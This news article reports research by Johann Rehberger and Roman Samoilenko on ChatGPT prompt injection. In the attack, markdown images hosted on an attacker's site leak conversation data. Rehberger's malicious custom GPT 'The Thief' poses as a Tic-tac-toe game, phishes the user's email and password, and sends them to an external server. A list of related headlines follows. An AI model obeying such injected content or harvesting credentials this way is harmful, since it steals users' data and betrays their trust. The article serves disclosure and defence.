Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server.
Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images.
They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user's conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker's website.
The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code.
In both cases, the markdown image processed by the chatbot - which can be an invisible single-pixel image - is hosted on the attacker's site.
ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing.
Rehberger said similar issues were found in chatbots such as Bing Chat, Google's Bard and Anthropic Claud, whose developers released fixes.
The researcher noticed this week that OpenAI has also started taking action to tackle the attack method.
The mitigations have apparently only been applied to the web application - the attack still works on mobile apps - and they don't completely prevent attacks.
On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. OpenAI announced in November that Plus and Enterprise users of ChatGPT would be allowed to create their own GPT, which they can customize for specific tasks or topics.
Rehberger created a GPT named 'The Thief' that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim's knowledge.
This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a 'personalized experience' and the user's password as part of a 'security process'.
The provided information is then sent to the attacker's server.
The researcher also showed how an attacker may be able to publish such a malicious GPT on the official GPTStore.
OpenAI has implemented a system that prevents the publishing of GPTs that are obviously malicious.
SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds.


This Cyber News was published on www.securityweek.com. Publication date: Fri, 22 Dec 2023 11:13:05 +0000


Cyber News related to Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

GPT in Slack With React Integration - Understanding GPT. Before delving into the intricacies of GPT Slack React integration, let's grasp the fundamentals of GPT. Developed by OpenAI, GPT is a state-of-the-art language model that utilizes deep learning to generate human-like text based on ...
10 months ago Feeds.dzone.com
Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher - A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server. Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of ...
10 months ago Securityweek.com
Malicious ChatGPT Agents May Steal Chat Messages and Data - In November 2023, OpenAI released GPTs publicly for everyone to create their customized version of GPT models. Several new customized GPTs were created for different purposes. On the other hand, threat actors can also utilize this public GPT model to ...
10 months ago Cybersecuritynews.com
CVE-2023-37274 - Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. When Auto-GPT is executed directly on the host system via the provided run.sh or run.bat files, custom Python code execution is sandboxed ...
1 year ago
OpenAI rolls out imperfect fix for ChatGPT data leak flaw - OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under ...
10 months ago Bleepingcomputer.com
AI models can be weaponized to hack websites on their own The Register - AI models, the subject of ongoing safety concerns about harmful and biased output, pose a risk beyond content emission. When wedded with tools that enable automated interaction with other systems, they can act on their own as malicious agents. ...
8 months ago Go.theregister.com
Latest Information Security and Hacking Incidents - Recently, OpenAI and WHOOP collaborated to launch a GPT-4-powered, individualized health and fitness coach. A multitude of questions about health and fitness can be answered by WHOOP Coach. In addition to WHOOP, Summer Health, a text-based pediatric ...
9 months ago Cysecurity.news
Credentials are Still King: Leaked Credentials, Data Breaches and Dark Web Markets - Infostealers infect computers, steal all of the credentials saved in the browser along with active session cookies and other data, then export it back to command and control infrastructure before, in some cases, self-terminating. This article will ...
9 months ago Bleepingcomputer.com
ChatGPT 4 can exploit 87% of one-day vulnerabilities - Since the widespread and growing use of ChatGPT and other large language models in recent years, cybersecurity has been a top concern. ChatGPT 4 quickly exploited one-day vulnerabilities. During the study, the team used 15 one-day vulnerabilities ...
4 months ago Securityintelligence.com
One Phish, Two Phish, Red Phish, Blue Phish - I sat down for a chat with George Skouroupathis, our phishing expert at Resonance Security. Phishing is often the first step taken by hackers in a larger scam. There are lots of different kinds of phishing attacks, but one of the most prevalent is ...
5 months ago Hackread.com
OpenAI's New GPT Store May Carry Data Security Risks - A new kind of app store for ChatGPT may expose users to malicious bots, and legitimate ones that siphon their data to insecure, external locales. ChatGPT's fast rise in popularity, combined with the open source accessibility of the early GPT models, ...
9 months ago Darkreading.com
Data thieves abuse Microsoft's 'verified publisher' status The Register - Miscreants using malicious OAuth applications abused Microsoft's "Verified publisher" status to gain access to organizations' cloud environments, then steal data and pry into to users' mailboxes, calendars, and meetings. According to researchers with ...
1 year ago Packetstormsecurity.com
CVE-2023-37273 - Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. Running Auto-GPT version prior to 0.4.3 by cloning the git repo and executing `docker compose run auto-gpt` in the repo root uses a different ...
1 year ago
OpenAI study reveals surprising role of AI in future biological threat creation - OpenAI, the research organization behind the powerful language model GPT-4, has released a new study that examines the possibility of using AI to assist in creating biological threats. One such frontier risk is the ability for AI systems, such as ...
9 months ago Venturebeat.com
Pen Testing Across the Environment: External, Internal, and Wireless Assessments - Among other controls, penetration testing stands out because it simulates attackers' malicious activities and tactics to identify security gaps in business systems or applications. Because pen tests thoroughly investigate vulnerabilities, the scope ...
4 months ago Securityboulevard.com
Microsoft Invests Billions in OpenAI – Innovator in Chatbot and GPT Technology - Microsoft has announced a $1 billion investment in OpenAI, the San Francisco-based artificial intelligence (AI) research and development firm. Founded by tech moguls Elon Musk and Sam Altman, OpenAI is a leader in AI technology, and the investment ...
1 year ago Securityweek.com
Hacker Conversations: Runa Sandvik - The driving motivation for almost all cybersecurity researchers is an insatiable curiosity - it's like an itch that must be scratched. How that itch is scratched is the difference between different researchers. Runa Sandvik describes herself as a ...
10 months ago Securityweek.com
What happens when you accidentally leak your AWS API keys? - My situation had no ill consequences, but it could have if I had used my actual email for the script or if my project was bigger and I had used AWS or another cloud provider and hardcoded those credentials. In a later class I did learn how to safely ...
7 months ago Isc.sans.edu
XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT - With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information. In this blog post, I'll walk you through my discovery of two cross-site scripting vulnerabilities in ...
8 months ago Imperva.com
Best of 2023: Combo Lists & the Dark Web: Understanding Leaked Credentials - In today's interconnected, cloud-based world, user credentials are the keys that grant entry to the house that stores an organization's digital treasure. Just as burglars pick the lock on a physical house, cybercriminals use stolen credentials to ...
10 months ago Securityboulevard.com
CVE-2023-37275 - Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. The Auto-GPT command line UI makes heavy use of color-coded print statements to signify different types of system messages to the user, ...
1 year ago
361 million stolen accounts leaked on Telegram added to HIBP - A massive trove of 361 million email addresses from credentials stolen by password-stealing malware, in credential stuffing attacks, and from data breaches was added to the Have I Been Pwned data breach notification service, allowing anyone to check ...
4 months ago Bleepingcomputer.com
8 Tips on Leveraging AI Tools Without Compromising Security - Forecasts like the Nielsen Norman Group estimating that AI tools may improve an employee's productivity by 66% have companies everywhere wanting to leverage these tools immediately. How can companies employ these powerful AI/ML tools without ...
11 months ago Darkreading.com
Investigator Gains Unauthorized Access to Toyota Supplier Database Containing Data on 14000 Associates - Toyota's Global Supplier Preparation Information Management System (GSPIMS) was recently breached by a security researcher who responsibly reported the issue to the company. GSPIMS is a web application that allows employees and suppliers to remotely ...
1 year ago Bleepingcomputer.com

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)